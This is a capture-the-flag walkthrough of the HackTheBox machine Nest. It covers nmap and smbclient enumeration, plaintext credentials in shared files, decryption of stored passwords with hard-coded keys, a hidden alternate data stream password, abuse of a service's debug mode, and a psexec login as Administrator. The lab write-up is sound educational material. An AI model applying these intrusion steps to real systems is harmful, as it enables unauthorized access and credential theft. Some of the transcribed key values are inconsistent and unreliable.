Nest HackTheBox Walkthrough

Today we are going to crack a machine called Nest. It was created by VbScrub. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!

Penetration Testing Methodology

·         Network Scanning

o   Nmap Scan

·         Enumeration

o   Enumerating SMB Shares

o   Downloading Files from SMB

o   Enumerating TempUser

·         Exploitation

o   Enumerating Config files for Internal Paths

o   Enumerating C. Smith User

o   Extracting RUScanner Files

o   Inspecting VB Script to find Decrypt String

o   Decoding C. Smith Password

o   Reading User Flag

·         Privilege Escalation

o   Enumerating HQK Reporting Tool

o   Extracting Debug Password from ADS

o   Extracting Administrator Encrypted Password

o   Decrypting Administrator Password

o   Reading the Root Flag

Walkthrough

Network Scanning

To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.

IP Address assigned: 10.129.101.34

Now that we have the IP Address. We need to enumerate open ports on the machine. For this, we will be running a nmap scan.

nmap -A 10.129.101.34



The Nmap Version scan quickly gave us some great information. It positively informed that SMB (445) service is running on the machine.

Enumeration

Since we have the SMB service, we start with looking for users inside the SMB. We connect using smbclient and we find that there is a share by the name of Data. We reconnect to the Data share. Here we find multiple directories. We first got inside the Shared directory

smbclient -L 10.129.101.34

smbclient \\\\10.129.101.34\\Data

cd Shared\

cd Templates\

cd HR\

get "Welcome Email.txt"



Here we found Maintenance and Templates directories. We went inside the Templates directory to find HR and Marketing directory. We traversed inside the HR directory. Here we found a Welcome Email text file. To inspect it we download it to our local machine. We went back to the Maintenance directory to find a Maintenance Alerts text file. We download it as well.

cd Maintenance

get "Maintenance Alerts.txt"



We read the Welcome Email to find a set of credentials for the user TempUser.

cat 'Welcome Email.txt'

Username: TempUser

Password welcome2019



We reconnect to the SMB service but this time as TempUser. We start looking around. WE found an IT directory. Inside it there were multiple directories. We entered the Config directory. There were bunch of directories We reconnect to the SMB service but this time as Temp User. We start looking around. WE found an IT directory. Inside it there were multiple directories. We entered the Config directory. There were bunch of applications directories present there. It might be the files of the various applications installed on the target machine or the software that are shared on the network to be accessible to each user. The RU Scanner seemed a bit odd. We thought to look inside it.               We found its configuration file. Time to download it to our local machine.

smbclient \\\\10.129.101.34\\Data -U TempUser

cd IT

cd Configs

cd "RU Scanner"

get RU_config.xml



We went back to the Config Directory and got all the config files of all the other applications as well. We downloaded all of them to our local machine.

cd Configs

cd NotepadPlusPlus

get config.xml



We read the config.xml file of the Notepad plus plus to find that there are multiple paths of different files that are accessed by the Notepad Plus Plus. We also got to know about 2 users. Carl and C.Smith.

C:\windows\System32\drivers\etc\hosts

\\HTB-NEST\Secure$\IT\Carl\Temp.txt

C:\Users\C.Smits\Desktop\todo.txt



We read the RU Scanner's config file to get the c. smith user's credentials. but the password seems to be encrypted.

cat RU_config.xml

Username: c.smith

fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=



Exploitation

Back to our SMB session we get inside the Secure Share and get inside the IT directory but we are not able to list its contents. Hence, we move forward with the Chris directory as shown in the image. We enumerate the VB Projects directory to find a WIP folder. Inside that we had a RU directory. Inside the directory we found the consolidated code which is basically a .NET VB project. RUScanner.sln is the main Visual Studio project file.

smbclient \\\\10.129.101.34\\Secure -U TempUser

cd IT

cd Carl

cd "VB Projects"

cd WIP

cd RU



Inside the RUScanner directory we found multiple bin files and Visual basic files. We downloaded all of those files to our local machine.

cd RUScanner

get Utils.vb

get Module1.vb



While inspecting the code, we saw that the Utils.vb, a class file that contained EncryptString and DecryptString functions. There is a reference of this in the Module1.vb1 as shown in the image below.

Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)

Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)



We opened the code form the script into a C# Online Complier known as .NET Fiddle and replace the string inside the Decrypt String with the password hash we found for the user C. Smith. When we run the code, the password gets decrypted and we get the clear text password for C. Smith user.

fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=

xRxRxPANCAK3SxRxRx



Now that we have the credentials for C. Smith, we enumerate SMB shares accessible by him. We found the user.txt file.

smbclient \\\\10.129.101.34\\users -U C.Smith

cd C.Smith

get user.txt

exit

cat user.txt



Privilege Escalation

We login into the Users share using C. Smith's credentials. Here, we found a directory by the name of HQK Reporting. It contained a total of 3 items. One directory by the name of AD Integration Module, one text file by the name of Debug Mode Password.txt and one XML file by the name of HQK_Config_Backup.xml

We download all three to our local machine. We try to read the Debug Mode Password.txt and find that it is empty. Then we read the XML file to see a TCP port 4386. This might be the port where HQK Reporting Tool was running.

smbclient \\\\10.129.101.34\\users -U C.Smith

cd C.Smith

cd "HQK Reporting"

get HQK_Config_Backup.xml

get "Debug Mode Password.txt"

exit

cat 'Debug Mode Password.txt'

cat HQK_Config_Backup.xml



This is where, we thought we are missing something. The Debug Mode Password shouldn't be empty. We go back to the SMB share and see that it is reported as 0 in size there too. It is then when it hit us that it is possible to hide data in Alternative Data Stream of a certain file. We decided to check for streams using allinfo command. We find that there is an alternative data stream by the name of Password. We download the file again this time with alternative data stream. We read the password to find a password as shown in the image.

allinfo "Debug Mode Password.txt"

DEBUGM~1.TXT

[:Passwword:$DATA]

get DEBUGM~1.txt:password

cat DEBUGM~1.txt:password

WBQ201953D8w



We used the telnet to connect to the service at the port 4386. Since we don’t know our way around a HQK Reporting Service, we use the help command to understand the service. If we remember correctly the password, we just recovered is a Debug password and HQK Reporting service has a Debug mode. Hence, we ran the debug command using the password. This enabled the debug mode. We used to help again to check if new commands have appeared or not. We find a command setdir. We use it with the list command to find the LDAP directory.

telnet 10.129.101.34 4386

help

DEBUG WBQ201953D8w

setdir ..

list

LDAP



Entering LDAP directory, we find the ldap.conf file. After a bit tinkering, we found that the showquery command can read the contents of a file. But it has to be used with the index number of the file. Like if you want to read the first file in the directory use it like showquery 1. and so on. So, we read the file using the showquery command to find another encrypted password for Administrator.

setdir ldap

list

showquery 2

User=Administrator

Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=



There is an executable file called HqkLdap.exe inside the same directory, we download the it through our SMB session.

cd "AD Integration Module"

get HqkLdap.exe



We use the dnSpy to inspect the code and we found the Encrypted String function as shown in the image.

(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z")



After inspecting the code, we feel like the code is trying to integrate with Active Directory that means that if we crack this password, we can get the administrator access on the target machine. We went back to the Fiddle and then replaced the encrypted code and ran the code. We have the unencrypted password.

(Decrypt, "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", 667912, "131Rf99", 3, "1L1SA61493DRV53Z", 256)

XtH4nkS4Pl4y1nGX



We used the password we just cracked to get the session on the target machine as Administrator. Now we will read the root flag and conclude this machine.

python3 psexec.py Administrator@10.129.101.34

cd C:\Users\Administrator\Desktop\

type root.txt



0 comments:

Post a Comment